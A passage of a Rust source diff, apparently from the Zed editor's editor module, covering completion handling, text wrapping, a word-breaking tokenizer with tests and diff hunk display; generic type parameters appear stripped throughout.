+ let type_id = std::any::TypeId::of::(); + self.addons + .get_mut(&type_id) + .and_then(|item| item.to_any_mut()?.downcast_mut::()) + } + + fn character_size(&self, window: &mut Window) -> gpui::Size { + let text_layout_details = self.text_layout_details(window); + let style = &text_layout_details.editor_style; + let font_id = window.text_system().resolve_font(&style.text.font()); + let font_size = style.text.font_size.to_pixels(window.rem_size()); + let line_height = style.text.line_height_in_pixels(window.rem_size()); + let em_width = window.text_system().em_width(font_id, font_size).unwrap(); + + gpui::Size::new(em_width, line_height) + } + + pub fn 
wait_for_diff_to_load(&self) -> Option>> { + self.load_diff_task.clone() + } + + fn read_metadata_from_db( + &mut self, + item_id: u64, + workspace_id: WorkspaceId, + window: &mut Window, + cx: &mut Context, + ) { + if self.is_singleton(cx) + && WorkspaceSettings::get(None, cx).restore_on_startup != RestoreOnStartupBehavior::None + { + let buffer_snapshot = OnceCell::new(); + + if let Some(folds) = DB.get_editor_folds(item_id, workspace_id).log_err() { + if !folds.is_empty() { + let snapshot = + buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); + self.fold_ranges( + folds + .into_iter() + .map(|(start, end)| { + snapshot.clip_offset(start, Bias::Left) + ..snapshot.clip_offset(end, Bias::Right) + }) + .collect(), + false, + window, + cx, + ); + } + } + + if let Some(selections) = DB.get_editor_selections(item_id, workspace_id).log_err() { + if !selections.is_empty() { + let snapshot = + buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); + self.change_selections(None, window, cx, |s| { + s.select_ranges(selections.into_iter().map(|(start, end)| { + snapshot.clip_offset(start, Bias::Left) + ..snapshot.clip_offset(end, Bias::Right) + })); + }); + } + }; + } + + self.read_scroll_position_from_db(item_id, workspace_id, window, cx); + } +} + +fn vim_enabled(cx: &App) -> bool { + cx.global::() + .raw_user_settings() + .get("vim_mode") + == Some(&serde_json::Value::Bool(true)) +} + +// Consider user intent and default settings +fn choose_completion_range( + completion: &Completion, + intent: CompletionIntent, + buffer: &Entity, + cx: &mut Context, +) -> Range { + fn should_replace( + completion: &Completion, + insert_range: &Range, + intent: CompletionIntent, + completion_mode_setting: LspInsertMode, + buffer: &Buffer, + ) -> bool { + // specific actions take precedence over settings + match intent { + CompletionIntent::CompleteWithInsert => return false, + CompletionIntent::CompleteWithReplace => return true, + CompletionIntent::Complete | 
CompletionIntent::Compose => {} + } + + match completion_mode_setting { + LspInsertMode::Insert => false, + LspInsertMode::Replace => true, + LspInsertMode::ReplaceSubsequence => { + let mut text_to_replace = buffer.chars_for_range( + buffer.anchor_before(completion.replace_range.start) + ..buffer.anchor_after(completion.replace_range.end), + ); + let mut completion_text = completion.new_text.chars(); + + // is `text_to_replace` a subsequence of `completion_text` + text_to_replace + .all(|needle_ch| completion_text.any(|haystack_ch| haystack_ch == needle_ch)) + } + LspInsertMode::ReplaceSuffix => { + let range_after_cursor = insert_range.end..completion.replace_range.end; + + let text_after_cursor = buffer + .text_for_range( + buffer.anchor_before(range_after_cursor.start) + ..buffer.anchor_after(range_after_cursor.end), + ) + .collect::(); + completion.new_text.ends_with(&text_after_cursor) + } + } + } + + let buffer = buffer.read(cx); + + if let CompletionSource::Lsp { + insert_range: Some(insert_range), + .. 
+ } = &completion.source + { + let completion_mode_setting = + language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) + .completions + .lsp_insert_mode; + + if !should_replace( + completion, + &insert_range, + intent, + completion_mode_setting, + buffer, + ) { + return insert_range.to_offset(buffer); + } + } + + completion.replace_range.to_offset(buffer) +} + +fn insert_extra_newline_brackets( + buffer: &MultiBufferSnapshot, + range: Range, + language: &language::LanguageScope, +) -> bool { + let leading_whitespace_len = buffer + .reversed_chars_at(range.start) + .take_while(|c| c.is_whitespace() && *c != '\n') + .map(|c| c.len_utf8()) + .sum::(); + let trailing_whitespace_len = buffer + .chars_at(range.end) + .take_while(|c| c.is_whitespace() && *c != '\n') + .map(|c| c.len_utf8()) + .sum::(); + let range = range.start - leading_whitespace_len..range.end + trailing_whitespace_len; + + language.brackets().any(|(pair, enabled)| { + let pair_start = pair.start.trim_end(); + let pair_end = pair.end.trim_start(); + + enabled + && pair.newline + && buffer.contains_str_at(range.end, pair_end) + && buffer.contains_str_at(range.start.saturating_sub(pair_start.len()), pair_start) + }) +} + +fn insert_extra_newline_tree_sitter(buffer: &MultiBufferSnapshot, range: Range) -> bool { + let (buffer, range) = match buffer.range_to_buffer_ranges(range).as_slice() { + [(buffer, range, _)] => (*buffer, range.clone()), + _ => return false, + }; + let pair = { + let mut result: Option = None; + + for pair in buffer + .all_bracket_ranges(range.clone()) + .filter(move |pair| { + pair.open_range.start <= range.start && pair.close_range.end >= range.end + }) + { + let len = pair.close_range.end - pair.open_range.start; + + if let Some(existing) = &result { + let existing_len = existing.close_range.end - existing.open_range.start; + if len > existing_len { + continue; + } + } + + result = Some(pair); + } + + result + }; + let Some(pair) = pair else { + return false; + }; 
+ pair.newline_only + && buffer + .chars_for_range(pair.open_range.end..range.start) + .chain(buffer.chars_for_range(range.end..pair.close_range.start)) + .all(|c| c.is_whitespace() && c != '\n') +} + +fn get_uncommitted_diff_for_buffer( + project: &Entity, + buffers: impl IntoIterator>, + buffer: Entity, + cx: &mut App, +) -> Task<()> { + let mut tasks = Vec::new(); + project.update(cx, |project, cx| { + for buffer in buffers { + if project::File::from_dyn(buffer.read(cx).file()).is_some() { + tasks.push(project.open_uncommitted_diff(buffer.clone(), cx)) + } + } + }); + cx.spawn(async move |cx| { + let diffs = future::join_all(tasks).await; + buffer + .update(cx, |buffer, cx| { + for diff in diffs.into_iter().flatten() { + buffer.add_diff(diff, cx); + } + }) + .ok(); + }) +} + +fn char_len_with_expanded_tabs(offset: usize, text: &str, tab_size: NonZeroU32) -> usize { + let tab_size = tab_size.get() as usize; + let mut width = offset; + + for ch in text.chars() { + width += if ch == '\t' { + tab_size - (width % tab_size) + } else { + 1 + }; + } + + width - offset +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_string_size_with_expanded_tabs() { + let nz = |val| NonZeroU32::new(val).unwrap(); + assert_eq!(char_len_with_expanded_tabs(0, "", nz(4)), 0); + assert_eq!(char_len_with_expanded_tabs(0, "hello", nz(4)), 5); + assert_eq!(char_len_with_expanded_tabs(0, "\thello", nz(4)), 9); + assert_eq!(char_len_with_expanded_tabs(0, "abc\tab", nz(4)), 6); + assert_eq!(char_len_with_expanded_tabs(0, "hello\t", nz(4)), 8); + assert_eq!(char_len_with_expanded_tabs(0, "\t\t", nz(8)), 16); + assert_eq!(char_len_with_expanded_tabs(0, "x\t", nz(8)), 8); + assert_eq!(char_len_with_expanded_tabs(7, "x\t", nz(8)), 9); + } +} + +/// Tokenizes a string into runs of text that should stick together, or that is whitespace. 
+struct WordBreakingTokenizer<'a> { + input: &'a str, +} + +impl<'a> WordBreakingTokenizer<'a> { + fn new(input: &'a str) -> Self { + Self { input } + } +} + +fn is_char_ideographic(ch: char) -> bool { + use unicode_script::Script::*; + use unicode_script::UnicodeScript; + matches!(ch.script(), Han | Tangut | Yi) +} + +fn is_grapheme_ideographic(text: &str) -> bool { + text.chars().any(is_char_ideographic) +} + +fn is_grapheme_whitespace(text: &str) -> bool { + text.chars().any(|x| x.is_whitespace()) +} + +fn should_stay_with_preceding_ideograph(text: &str) -> bool { + text.chars().next().map_or(false, |ch| { + matches!(ch, '。' | '、' | ',' | '?' | '!' | ':' | ';' | '…') + }) +} + +#[derive(PartialEq, Eq, Debug, Clone, Copy)] +enum WordBreakToken<'a> { + Word { token: &'a str, grapheme_len: usize }, + InlineWhitespace { token: &'a str, grapheme_len: usize }, + Newline, +} + +impl<'a> Iterator for WordBreakingTokenizer<'a> { + /// Yields a span, the count of graphemes in the token, and whether it was + /// whitespace. Note that it also breaks at word boundaries. 
+ type Item = WordBreakToken<'a>; + + fn next(&mut self) -> Option { + use unicode_segmentation::UnicodeSegmentation; + if self.input.is_empty() { + return None; + } + + let mut iter = self.input.graphemes(true).peekable(); + let mut offset = 0; + let mut grapheme_len = 0; + if let Some(first_grapheme) = iter.next() { + let is_newline = first_grapheme == "\n"; + let is_whitespace = is_grapheme_whitespace(first_grapheme); + offset += first_grapheme.len(); + grapheme_len += 1; + if is_grapheme_ideographic(first_grapheme) && !is_whitespace { + if let Some(grapheme) = iter.peek().copied() { + if should_stay_with_preceding_ideograph(grapheme) { + offset += grapheme.len(); + grapheme_len += 1; + } + } + } else { + let mut words = self.input[offset..].split_word_bound_indices().peekable(); + let mut next_word_bound = words.peek().copied(); + if next_word_bound.map_or(false, |(i, _)| i == 0) { + next_word_bound = words.next(); + } + while let Some(grapheme) = iter.peek().copied() { + if next_word_bound.map_or(false, |(i, _)| i == offset) { + break; + }; + if is_grapheme_whitespace(grapheme) != is_whitespace + || (grapheme == "\n") != is_newline + { + break; + }; + offset += grapheme.len(); + grapheme_len += 1; + iter.next(); + } + } + let token = &self.input[..offset]; + self.input = &self.input[offset..]; + if token == "\n" { + Some(WordBreakToken::Newline) + } else if is_whitespace { + Some(WordBreakToken::InlineWhitespace { + token, + grapheme_len, + }) + } else { + Some(WordBreakToken::Word { + token, + grapheme_len, + }) + } + } else { + None + } + } +} + +#[test] +fn test_word_breaking_tokenizer() { + let tests: &[(&str, &[WordBreakToken<'static>])] = &[ + ("", &[]), + (" ", &[whitespace(" ", 2)]), + ("Ʒ", &[word("Ʒ", 1)]), + ("Ǽ", &[word("Ǽ", 1)]), + ("⋑", &[word("⋑", 1)]), + ("⋑⋑", &[word("⋑⋑", 2)]), + ( + "原理,进而", + &[word("原", 1), word("理,", 2), word("进", 1), word("而", 1)], + ), + ( + "hello world", + &[word("hello", 5), whitespace(" ", 1), word("world", 5)], + 
), + ( + "hello, world", + &[word("hello,", 6), whitespace(" ", 1), word("world", 5)], + ), + ( + " hello world", + &[ + whitespace(" ", 2), + word("hello", 5), + whitespace(" ", 1), + word("world", 5), + ], + ), + ( + "这是什么 \n 钢笔", + &[ + word("这", 1), + word("是", 1), + word("什", 1), + word("么", 1), + whitespace(" ", 1), + newline(), + whitespace(" ", 1), + word("钢", 1), + word("笔", 1), + ], + ), + (" mutton", &[whitespace(" ", 1), word("mutton", 6)]), + ]; + + fn word(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { + WordBreakToken::Word { + token, + grapheme_len, + } + } + + fn whitespace(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { + WordBreakToken::InlineWhitespace { + token, + grapheme_len, + } + } + + fn newline() -> WordBreakToken<'static> { + WordBreakToken::Newline + } + + for (input, result) in tests { + assert_eq!( + WordBreakingTokenizer::new(input) + .collect::>() + .as_slice(), + *result, + ); + } +} + +fn wrap_with_prefix( + line_prefix: String, + unwrapped_text: String, + wrap_column: usize, + tab_size: NonZeroU32, + preserve_existing_whitespace: bool, +) -> String { + let line_prefix_len = char_len_with_expanded_tabs(0, &line_prefix, tab_size); + let mut wrapped_text = String::new(); + let mut current_line = line_prefix.clone(); + + let tokenizer = WordBreakingTokenizer::new(&unwrapped_text); + let mut current_line_len = line_prefix_len; + let mut in_whitespace = false; + for token in tokenizer { + let have_preceding_whitespace = in_whitespace; + match token { + WordBreakToken::Word { + token, + grapheme_len, + } => { + in_whitespace = false; + if current_line_len + grapheme_len > wrap_column + && current_line_len != line_prefix_len + { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } + current_line.push_str(token); + current_line_len += grapheme_len; + } + 
WordBreakToken::InlineWhitespace { + mut token, + mut grapheme_len, + } => { + in_whitespace = true; + if have_preceding_whitespace && !preserve_existing_whitespace { + continue; + } + if !preserve_existing_whitespace { + token = " "; + grapheme_len = 1; + } + if current_line_len + grapheme_len > wrap_column { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } else if current_line_len != line_prefix_len || preserve_existing_whitespace { + current_line.push_str(token); + current_line_len += grapheme_len; + } + } + WordBreakToken::Newline => { + in_whitespace = true; + if preserve_existing_whitespace { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } else if have_preceding_whitespace { + continue; + } else if current_line_len + 1 > wrap_column && current_line_len != line_prefix_len + { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } else if current_line_len != line_prefix_len { + current_line.push(' '); + current_line_len += 1; + } + } + } + } + + if !current_line.is_empty() { + wrapped_text.push_str(¤t_line); + } + wrapped_text +} + +#[test] +fn test_wrap_with_prefix() { + assert_eq!( + wrap_with_prefix( + "# ".to_string(), + "abcdefg".to_string(), + 4, + NonZeroU32::new(4).unwrap(), + false, + ), + "# abcdefg" + ); + assert_eq!( + wrap_with_prefix( + "".to_string(), + "\thello world".to_string(), + 8, + NonZeroU32::new(4).unwrap(), + false, + ), + "hello\nworld" + ); + assert_eq!( + wrap_with_prefix( + "// ".to_string(), + "xx \nyy zz aa bb cc".to_string(), + 12, + NonZeroU32::new(4).unwrap(), + false, + ), + "// xx yy zz\n// aa bb cc" + ); + assert_eq!( + wrap_with_prefix( + String::new(), + "这是什么 \n 钢笔".to_string(), + 3, + 
NonZeroU32::new(4).unwrap(), + false, + ), + "这是什\n么 钢\n笔" + ); +} + +pub trait CollaborationHub { + fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap; + fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap; + fn user_names(&self, cx: &App) -> HashMap; +} + +impl CollaborationHub for Entity { + fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap { + self.read(cx).collaborators() + } + + fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap { + self.read(cx).user_store().read(cx).participant_indices() + } + + fn user_names(&self, cx: &App) -> HashMap { + let this = self.read(cx); + let user_ids = this.collaborators().values().map(|c| c.user_id); + this.user_store().read_with(cx, |user_store, cx| { + user_store.participant_names(user_ids, cx) + }) + } +} + +pub trait SemanticsProvider { + fn hover( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>; + + fn inline_values( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>>; + + fn inlay_hints( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>>; + + fn resolve_inlay_hint( + &self, + hint: InlayHint, + buffer_handle: Entity, + server_id: LanguageServerId, + cx: &mut App, + ) -> Option>>; + + fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool; + + fn document_highlights( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>>; + + fn definitions( + &self, + buffer: &Entity, + position: text::Anchor, + kind: GotoDefinitionKind, + cx: &mut App, + ) -> Option>>>; + + fn range_for_rename( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>>>; + + fn perform_rename( + &self, + buffer: &Entity, + position: text::Anchor, + new_name: String, + cx: &mut App, + ) -> Option>>; +} + +pub trait CompletionProvider { + fn completions( + &self, + excerpt_id: ExcerptId, + buffer: &Entity, + buffer_position: text::Anchor, + 
trigger: CompletionContext, + window: &mut Window, + cx: &mut Context, + ) -> Task>>>; + + fn resolve_completions( + &self, + buffer: Entity, + completion_indices: Vec, + completions: Rc>>, + cx: &mut Context, + ) -> Task>; + + fn apply_additional_edits_for_completion( + &self, + _buffer: Entity, + _completions: Rc>>, + _completion_index: usize, + _push_to_history: bool, + _cx: &mut Context, + ) -> Task>> { + Task::ready(Ok(None)) + } + + fn is_completion_trigger( + &self, + buffer: &Entity, + position: language::Anchor, + text: &str, + trigger_in_words: bool, + cx: &mut Context, + ) -> bool; + + fn sort_completions(&self) -> bool { + true + } + + fn filter_completions(&self) -> bool { + true + } +} + +pub trait CodeActionProvider { + fn id(&self) -> Arc; + + fn code_actions( + &self, + buffer: &Entity, + range: Range, + window: &mut Window, + cx: &mut App, + ) -> Task>>; + + fn apply_code_action( + &self, + buffer_handle: Entity, + action: CodeAction, + excerpt_id: ExcerptId, + push_to_history: bool, + window: &mut Window, + cx: &mut App, + ) -> Task>; +} + +impl CodeActionProvider for Entity { + fn id(&self) -> Arc { + "project".into() + } + + fn code_actions( + &self, + buffer: &Entity, + range: Range, + _window: &mut Window, + cx: &mut App, + ) -> Task>> { + self.update(cx, |project, cx| { + let code_lens = project.code_lens(buffer, range.clone(), cx); + let code_actions = project.code_actions(buffer, range, None, cx); + cx.background_spawn(async move { + let (code_lens, code_actions) = join(code_lens, code_actions).await; + Ok(code_lens + .context("code lens fetch")? + .into_iter() + .chain(code_actions.context("code action fetch")?) 
+ .collect()) + }) + }) + } + + fn apply_code_action( + &self, + buffer_handle: Entity, + action: CodeAction, + _excerpt_id: ExcerptId, + push_to_history: bool, + _window: &mut Window, + cx: &mut App, + ) -> Task> { + self.update(cx, |project, cx| { + project.apply_code_action(buffer_handle, action, push_to_history, cx) + }) + } +} + +fn snippet_completions( + project: &Project, + buffer: &Entity, + buffer_position: text::Anchor, + cx: &mut App, +) -> Task>> { + let languages = buffer.read(cx).languages_at(buffer_position); + let snippet_store = project.snippets().read(cx); + + let scopes: Vec<_> = languages + .iter() + .filter_map(|language| { + let language_name = language.lsp_id(); + let snippets = snippet_store.snippets_for(Some(language_name), cx); + + if snippets.is_empty() { + None + } else { + Some((language.default_scope(), snippets)) + } + }) + .collect(); + + if scopes.is_empty() { + return Task::ready(Ok(vec![])); + } + + let snapshot = buffer.read(cx).text_snapshot(); + let chars: String = snapshot + .reversed_chars_for_range(text::Anchor::MIN..buffer_position) + .collect(); + let executor = cx.background_executor().clone(); + + cx.background_spawn(async move { + let mut all_results: Vec = Vec::new(); + for (scope, snippets) in scopes.into_iter() { + let classifier = CharClassifier::new(Some(scope)).for_completion(true); + let mut last_word = chars + .chars() + .take_while(|c| classifier.is_word(*c)) + .collect::(); + last_word = last_word.chars().rev().collect(); + + if last_word.is_empty() { + return Ok(vec![]); + } + + let as_offset = text::ToOffset::to_offset(&buffer_position, &snapshot); + let to_lsp = |point: &text::Anchor| { + let end = text::ToPointUtf16::to_point_utf16(point, &snapshot); + point_to_lsp(end) + }; + let lsp_end = to_lsp(&buffer_position); + + let candidates = snippets + .iter() + .enumerate() + .flat_map(|(ix, snippet)| { + snippet + .prefix + .iter() + .map(move |prefix| StringMatchCandidate::new(ix, &prefix)) + }) + 
.collect::>(); + + let mut matches = fuzzy::match_strings( + &candidates, + &last_word, + last_word.chars().any(|c| c.is_uppercase()), + 100, + &Default::default(), + executor.clone(), + ) + .await; + + // Remove all candidates where the query's start does not match the start of any word in the candidate + if let Some(query_start) = last_word.chars().next() { + matches.retain(|string_match| { + split_words(&string_match.string).any(|word| { + // Check that the first codepoint of the word as lowercase matches the first + // codepoint of the query as lowercase + word.chars() + .flat_map(|codepoint| codepoint.to_lowercase()) + .zip(query_start.to_lowercase()) + .all(|(word_cp, query_cp)| word_cp == query_cp) + }) + }); + } + + let matched_strings = matches + .into_iter() + .map(|m| m.string) + .collect::>(); + + let mut result: Vec = snippets + .iter() + .filter_map(|snippet| { + let matching_prefix = snippet + .prefix + .iter() + .find(|prefix| matched_strings.contains(*prefix))?; + let start = as_offset - last_word.len(); + let start = snapshot.anchor_before(start); + let range = start..buffer_position; + let lsp_start = to_lsp(&start); + let lsp_range = lsp::Range { + start: lsp_start, + end: lsp_end, + }; + Some(Completion { + replace_range: range, + new_text: snippet.body.clone(), + source: CompletionSource::Lsp { + insert_range: None, + server_id: LanguageServerId(usize::MAX), + resolved: true, + lsp_completion: Box::new(lsp::CompletionItem { + label: snippet.prefix.first().unwrap().clone(), + kind: Some(CompletionItemKind::SNIPPET), + label_details: snippet.description.as_ref().map(|description| { + lsp::CompletionItemLabelDetails { + detail: Some(description.clone()), + description: None, + } + }), + insert_text_format: Some(InsertTextFormat::SNIPPET), + text_edit: Some(lsp::CompletionTextEdit::InsertAndReplace( + lsp::InsertReplaceEdit { + new_text: snippet.body.clone(), + insert: lsp_range, + replace: lsp_range, + }, + )), + filter_text: 
Some(snippet.body.clone()), + sort_text: Some(char::MAX.to_string()), + ..lsp::CompletionItem::default() + }), + lsp_defaults: None, + }, + label: CodeLabel { + text: matching_prefix.clone(), + runs: Vec::new(), + filter_range: 0..matching_prefix.len(), + }, + icon_path: None, + documentation: snippet.description.clone().map(|description| { + CompletionDocumentation::SingleLine(description.into()) + }), + insert_text_mode: None, + confirm: None, + }) + }) + .collect(); + + all_results.append(&mut result); + } + + Ok(all_results) + }) +} + +impl CompletionProvider for Entity { + fn completions( + &self, + _excerpt_id: ExcerptId, + buffer: &Entity, + buffer_position: text::Anchor, + options: CompletionContext, + _window: &mut Window, + cx: &mut Context, + ) -> Task>>> { + self.update(cx, |project, cx| { + let snippets = snippet_completions(project, buffer, buffer_position, cx); + let project_completions = project.completions(buffer, buffer_position, options, cx); + cx.background_spawn(async move { + let snippets_completions = snippets.await?; + match project_completions.await? 
{ + Some(mut completions) => { + completions.extend(snippets_completions); + Ok(Some(completions)) + } + None => { + if snippets_completions.is_empty() { + Ok(None) + } else { + Ok(Some(snippets_completions)) + } + } + } + }) + }) + } + + fn resolve_completions( + &self, + buffer: Entity, + completion_indices: Vec, + completions: Rc>>, + cx: &mut Context, + ) -> Task> { + self.update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.resolve_completions(buffer, completion_indices, completions, cx) + }) + }) + } + + fn apply_additional_edits_for_completion( + &self, + buffer: Entity, + completions: Rc>>, + completion_index: usize, + push_to_history: bool, + cx: &mut Context, + ) -> Task>> { + self.update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.apply_additional_edits_for_completion( + buffer, + completions, + completion_index, + push_to_history, + cx, + ) + }) + }) + } + + fn is_completion_trigger( + &self, + buffer: &Entity, + position: language::Anchor, + text: &str, + trigger_in_words: bool, + cx: &mut Context, + ) -> bool { + let mut chars = text.chars(); + let char = if let Some(char) = chars.next() { + char + } else { + return false; + }; + if chars.next().is_some() { + return false; + } + + let buffer = buffer.read(cx); + let snapshot = buffer.snapshot(); + if !snapshot.settings_at(position, cx).show_completions_on_input { + return false; + } + let classifier = snapshot.char_classifier_at(position).for_completion(true); + if trigger_in_words && classifier.is_word(char) { + return true; + } + + buffer.completion_triggers().contains(text) + } +} + +impl SemanticsProvider for Entity { + fn hover( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>> { + Some(self.update(cx, |project, cx| project.hover(buffer, position, cx))) + } + + fn document_highlights( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>> { + 
Some(self.update(cx, |project, cx| { + project.document_highlights(buffer, position, cx) + })) + } + + fn definitions( + &self, + buffer: &Entity, + position: text::Anchor, + kind: GotoDefinitionKind, + cx: &mut App, + ) -> Option>>> { + Some(self.update(cx, |project, cx| match kind { + GotoDefinitionKind::Symbol => project.definition(&buffer, position, cx), + GotoDefinitionKind::Declaration => project.declaration(&buffer, position, cx), + GotoDefinitionKind::Type => project.type_definition(&buffer, position, cx), + GotoDefinitionKind::Implementation => project.implementation(&buffer, position, cx), + })) + } + + fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool { + // TODO: make this work for remote projects + self.update(cx, |project, cx| { + if project + .active_debug_session(cx) + .is_some_and(|(session, _)| session.read(cx).any_stopped_thread()) + { + return true; + } + + buffer.update(cx, |buffer, cx| { + project.any_language_server_supports_inlay_hints(buffer, cx) + }) + }) + } + + fn inline_values( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>> { + self.update(cx, |project, cx| { + let (session, active_stack_frame) = project.active_debug_session(cx)?; + + Some(project.inline_values(session, active_stack_frame, buffer_handle, range, cx)) + }) + } + + fn inlay_hints( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>> { + Some(self.update(cx, |project, cx| { + project.inlay_hints(buffer_handle, range, cx) + })) + } + + fn resolve_inlay_hint( + &self, + hint: InlayHint, + buffer_handle: Entity, + server_id: LanguageServerId, + cx: &mut App, + ) -> Option>> { + Some(self.update(cx, |project, cx| { + project.resolve_inlay_hint(hint, buffer_handle, server_id, cx) + })) + } + + fn range_for_rename( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>>> { + Some(self.update(cx, |project, cx| { + let buffer = buffer.clone(); + let task = 
project.prepare_rename(buffer.clone(), position, cx); + cx.spawn(async move |_, cx| { + Ok(match task.await? { + PrepareRenameResponse::Success(range) => Some(range), + PrepareRenameResponse::InvalidPosition => None, + PrepareRenameResponse::OnlyUnpreparedRenameSupported => { + // Fallback on using TreeSitter info to determine identifier range + buffer.update(cx, |buffer, _| { + let snapshot = buffer.snapshot(); + let (range, kind) = snapshot.surrounding_word(position); + if kind != Some(CharKind::Word) { + return None; + } + Some( + snapshot.anchor_before(range.start) + ..snapshot.anchor_after(range.end), + ) + })? + } + }) + }) + })) + } + + fn perform_rename( + &self, + buffer: &Entity, + position: text::Anchor, + new_name: String, + cx: &mut App, + ) -> Option>> { + Some(self.update(cx, |project, cx| { + project.perform_rename(buffer.clone(), position, new_name, cx) + })) + } +} + +fn inlay_hint_settings( + location: Anchor, + snapshot: &MultiBufferSnapshot, + cx: &mut Context, +) -> InlayHintSettings { + let file = snapshot.file_at(location); + let language = snapshot.language_at(location).map(|l| l.name()); + language_settings(language, file, cx).inlay_hints +} + +fn consume_contiguous_rows( + contiguous_row_selections: &mut Vec>, + selection: &Selection, + display_map: &DisplaySnapshot, + selections: &mut Peekable>>, +) -> (MultiBufferRow, MultiBufferRow) { + contiguous_row_selections.push(selection.clone()); + let start_row = MultiBufferRow(selection.start.row); + let mut end_row = ending_row(selection, display_map); + + while let Some(next_selection) = selections.peek() { + if next_selection.start.row <= end_row.0 { + end_row = ending_row(next_selection, display_map); + contiguous_row_selections.push(selections.next().unwrap().clone()); + } else { + break; + } + } + (start_row, end_row) +} + +fn ending_row(next_selection: &Selection, display_map: &DisplaySnapshot) -> MultiBufferRow { + if next_selection.end.column > 0 || next_selection.is_empty() { + 
MultiBufferRow(display_map.next_line_boundary(next_selection.end).0.row + 1) + } else { + MultiBufferRow(next_selection.end.row) + } +} + +impl EditorSnapshot { + pub fn remote_selections_in_range<'a>( + &'a self, + range: &'a Range, + collaboration_hub: &dyn CollaborationHub, + cx: &'a App, + ) -> impl 'a + Iterator { + let participant_names = collaboration_hub.user_names(cx); + let participant_indices = collaboration_hub.user_participant_indices(cx); + let collaborators_by_peer_id = collaboration_hub.collaborators(cx); + let collaborators_by_replica_id = collaborators_by_peer_id + .iter() + .map(|(_, collaborator)| (collaborator.replica_id, collaborator)) + .collect::>(); + self.buffer_snapshot + .selections_in_range(range, false) + .filter_map(move |(replica_id, line_mode, cursor_shape, selection)| { + let collaborator = collaborators_by_replica_id.get(&replica_id)?; + let participant_index = participant_indices.get(&collaborator.user_id).copied(); + let user_name = participant_names.get(&collaborator.user_id).cloned(); + Some(RemoteSelection { + replica_id, + selection, + cursor_shape, + line_mode, + participant_index, + peer_id: collaborator.peer_id, + user_name, + }) + }) + } + + pub fn hunks_for_ranges( + &self, + ranges: impl IntoIterator>, + ) -> Vec { + let mut hunks = Vec::new(); + let mut processed_buffer_rows: HashMap>> = + HashMap::default(); + for query_range in ranges { + let query_rows = + MultiBufferRow(query_range.start.row)..MultiBufferRow(query_range.end.row + 1); + for hunk in self.buffer_snapshot.diff_hunks_in_range( + Point::new(query_rows.start.0, 0)..Point::new(query_rows.end.0, 0), + ) { + // Include deleted hunks that are adjacent to the query range, because + // otherwise they would be missed. 
+ let mut intersects_range = hunk.row_range.overlaps(&query_rows); + if hunk.status().is_deleted() { + intersects_range |= hunk.row_range.start == query_rows.end; + intersects_range |= hunk.row_range.end == query_rows.start; + } + if intersects_range { + if !processed_buffer_rows + .entry(hunk.buffer_id) + .or_default() + .insert(hunk.buffer_range.start..hunk.buffer_range.end) + { + continue; + } + hunks.push(hunk); + } + } + } + + hunks + } + + fn display_diff_hunks_for_rows<'a>( + &'a self, + display_rows: Range, + folded_buffers: &'a HashSet, + ) -> impl 'a + Iterator { + let buffer_start = DisplayPoint::new(display_rows.start, 0).to_point(self); + let buffer_end = DisplayPoint::new(display_rows.end, 0).to_point(self); + + self.buffer_snapshot + .diff_hunks_in_range(buffer_start..buffer_end) + .filter_map(|hunk| { + if folded_buffers.contains(&hunk.buffer_id) { + return None; + } + + let hunk_start_point = Point::new(hunk.row_range.start.0, 0); + let hunk_end_point = Point::new(hunk.row_range.end.0, 0); + + let hunk_display_start = self.point_to_display_point(hunk_start_point, Bias::Left); + let hunk_display_end = self.point_to_display_point(hunk_end_point, Bias::Right); + + let display_hunk = if hunk_display_start.column() != 0 { + DisplayDiffHunk::Folded { + display_row: hunk_display_start.row(), + } + } else { + let mut end_row = hunk_display_end.row(); + if hunk_display_end.column() > 0 { + end_row.0 += 1; + } + let is_created_file = hunk.is_created_file(); + DisplayDiffHunk::Unfolded { + status: hunk.status(), + diff_base_byte_range: hunk.diff_base_byte_range, + display_row_range: hunk_display_start.row()..end_row, + multi_buffer_range: Anchor::range_in_buffer( + hunk.excerpt_id, + hunk.buffer_id, + hunk.buffer_range, + ), + is_created_file, + } + }; + + Some(display_hunk) + }) + } + + pub fn language_at(&self, position: T) -> Option<&Arc> { + self.display_snapshot.buffer_snapshot.language_at(position) + } + + pub fn is_focused(&self) -> bool { + 
